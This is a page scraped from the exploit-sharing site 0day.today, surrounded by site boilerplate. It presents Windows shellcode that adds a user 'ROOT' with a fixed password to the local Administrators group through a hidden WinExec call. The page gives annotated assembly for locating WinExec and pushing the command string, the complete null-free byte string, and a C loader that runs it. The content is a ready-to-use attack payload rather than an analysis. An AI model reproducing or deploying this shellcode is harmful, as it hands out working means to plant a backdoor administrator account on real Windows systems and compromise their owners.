0day.today - Biggest Exploit Database in the World.

Select your language:

Things you should know about 0day.today:

We use one main domain: http://0day.today
Most of the materials is completely FREE
If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD

We accept currencies: [contact admin to find more]

We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

I am registered user of 0day.today. I don't want to see this screen in future.

What to do first?

Read the [ agreement ]
Read the [ Submit ] rules
Visit the [ faq ] page
[ Register ] profile
Get [ GOLD ]
If you want to [ sell ]
If you want to [ buy ]
If you lost [ Account ]
Any questions [ admin@0day.today ]

Main links

You can contact us by

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ authorization ] [ registration ] [ restore account ]

You can contact us by:

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

Windows/x64 - WinExec Add-Admin Dynamic Null-Free Shellcode (210 Bytes)

Author

Bobby Cooke

Risk

[

Security Risk High

]

0day-ID

Category

Date add

Platform

// Shellcode Title:  WinExec Add-Admin Dynamic Null-Free Shellcode (210 Bytes)
// Shellcode Author: Bobby Cooke
// Date: March 21st, 2020
// Tested on:   Windows 10 Home - 1909 (x86_64), Windows 10 Pro - 1909 (x86)
// Description: Windows Shellcode that adds the user 'ROOT' with the password 'I@mR00T$' to the system. The user 'ROOT' is then added to the localgroup 'Administrators'.
/* Shoutout & thank you for the great learning resources: Offensive Security, Skape, Corelan, Pentester Academy

get_kernel32_address:
xor eax, eax
mov eax, [fs:eax+0x30] ; EAX = &PEB
mov eax, [eax+0xC]     ; EAX = &LDR
mov esi, [eax+0x1C]    ; ESI = 1st entry InitOrderList - ntdll.dll
lodsd                  ; EAX = 2nd entry InitOrderList - kernelbase.dll
xchg esi, eax
lodsd                  ; EAX = 3rd entry InitOrderList - kernel32.dll
mov eax, [eax+0x8]     ; EAX = &Kernel32.dll
push eax

get_kernel32_export_table:
mov ebx, [eax+0x3C] ; EBX = RVA NewEXEHeader
add ebx, eax        ; EBX = &NewEXEHeader
mov ebx, [ebx+0x78] ; EBX = RVA ExportTable
add ebx, eax        ; EBX = &ExportTable

get_export_name_table:
mov edx, [ebx+0x20] ; EDX = RVA ExportNameTable
add edx, eax        ; EDX = &ExportNameTable

get_export_ordinal_table:
mov ecx, [ebx+0x24] ; ECX = RVA ExportOrdinalTable
add ecx, eax        ; ECX = &ExportOrdinalTable
push ecx

get_export_addr_table:
mov edi, [ebx+0x1C] ; EDI = RVA ExportAddrTable
add edi, eax        ; EDI = &ExportAddrTable
push edi

WinExec_String:
push 0x456E6957     ; EniW

counter_init:
xor eax, eax        ; EAX = Counter

searchLoop:
mov edi, edx         ; EDI = &ExportNameTable
mov esi, esp         ; ESI = "WinE"
xor ecx, ecx
cld                  ; Process strings left to right
mov edi, [edi+eax*4] ; EDI = RVA NthNameString
add edi, [esp+0xC]   ; EDI = &NthNameString
add cx, 0x4          ; ECX = len("WinE")
repe cmpsb           ; compare [&NthNameString] to "WinExec"
jz found             ; If [&NthNameString] == "WinExec" end loop
inc eax              ; Counter ++
jmp short searchLoop ; restart loop

found:
mov ecx, [esp+0x8]     ; ECX = &ExportOrdinalTable
mov ax,  [ecx + eax*2] ;  AX = ordinalNumber
mov edx, [esp+0x4]     ; EDX = &ExportAddrTable
mov ebx, [edx + eax*4] ; EBX = RVA WinExec
add ebx, [esp+0xC]     ; EBX = &WinExec

add_user:
; Call WinExec( CmdLine, ShowState );
; $CmdLine = 'cmd.exe /c net user ROOT I@mR00T$ /ADD && net localgroup Administrators ROOT /ADD'
; $ShowState = SW_HIDE  
xor ecx, ecx
mul ecx
mov al, 0x44    ; D : 44
push eax
push 0x44412f20 ; DA/  
push 0x544f4f52 ; TOOR 
push 0x2073726f ;  sro 
push 0x74617274 ; tart 
push 0x73696e69 ; sini 
push 0x6d644120 ; mdA  
push 0x70756f72 ; puor 
push 0x676c6163 ; glac 
push 0x6f6c2074 ; ol t 
push 0x656e2026 ; en & 
push 0x26204444 ; & DD 
push 0x412f2024 ; A/ $ 
push 0x54303052 ; T00R 
push 0x6d404920 ; m@I  
push 0x544f4f52 ; TOOR 
push 0x20726573 ;  res 
push 0x75207465 ; u te 
push 0x6e20632f ; n c/ 
push 0x20657865 ;  exe 
push 0x2e646d63 ; .dmc 
mov eax, esp    ; EAX = &CmdLine
push ecx        ; $ShowState 
push eax        ; $CmdLine
call ebx        ; Call the WinExec Function

###############################################*/

#include <windows.h>
#include <stdio.h>

char code[] = \
"\x31\xc0\x64\x8b\x40\x30\x8b\x40\x0c\x8b\x70\x1c"
"\xad\x96\xad\x8b\x40\x08\x50\x8b\x58\x3c\x01\xc3"
"\x8b\x5b\x78\x01\xc3\x8b\x53\x20\x01\xc2\x8b\x4b"
"\x24\x01\xc1\x51\x8b\x7b\x1c\x01\xc7\x57\x68\x57"
"\x69\x6e\x45\x31\xc0\x89\xd7\x89\xe6\x31\xc9\xfc"
"\x8b\x3c\x87\x03\x7c\x24\x0c\x66\x83\xc1\x04\xf3"
"\xa6\x74\x03\x40\xeb\xe7\x8b\x4c\x24\x08\x66\x8b"
"\x04\x41\x8b\x54\x24\x04\x8b\x1c\x82\x03\x5c\x24"
"\x0c\x31\xc9\xf7\xe1\xb0\x44\x50\x68\x20\x2f\x41"
"\x44\x68\x52\x4f\x4f\x54\x68\x6f\x72\x73\x20\x68"
"\x74\x72\x61\x74\x68\x69\x6e\x69\x73\x68\x20\x41"
"\x64\x6d\x68\x72\x6f\x75\x70\x68\x63\x61\x6c\x67"
"\x68\x74\x20\x6c\x6f\x68\x26\x20\x6e\x65\x68\x44"
"\x44\x20\x26\x68\x24\x20\x2f\x41\x68\x52\x30\x30"
"\x54\x68\x20\x49\x40\x6d\x68\x52\x4f\x4f\x54\x68"
"\x73\x65\x72\x20\x68\x65\x74\x20\x75\x68\x2f\x63"
"\x20\x6e\x68\x65\x78\x65\x20\x68\x63\x6d\x64\x2e"
"\x89\xe0\x51\x50\xff\xd3";

int main(int argc, char **argv)
{
  int (*func)();
  func = (int(*)()) code;
  (int)(*func)();
}

#  0day.today [2024-11-14]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

Windows/x64 - WinExec Add-Admin Dynamic Null-Free Shellcode (210 Bytes)

Report Error

Report Error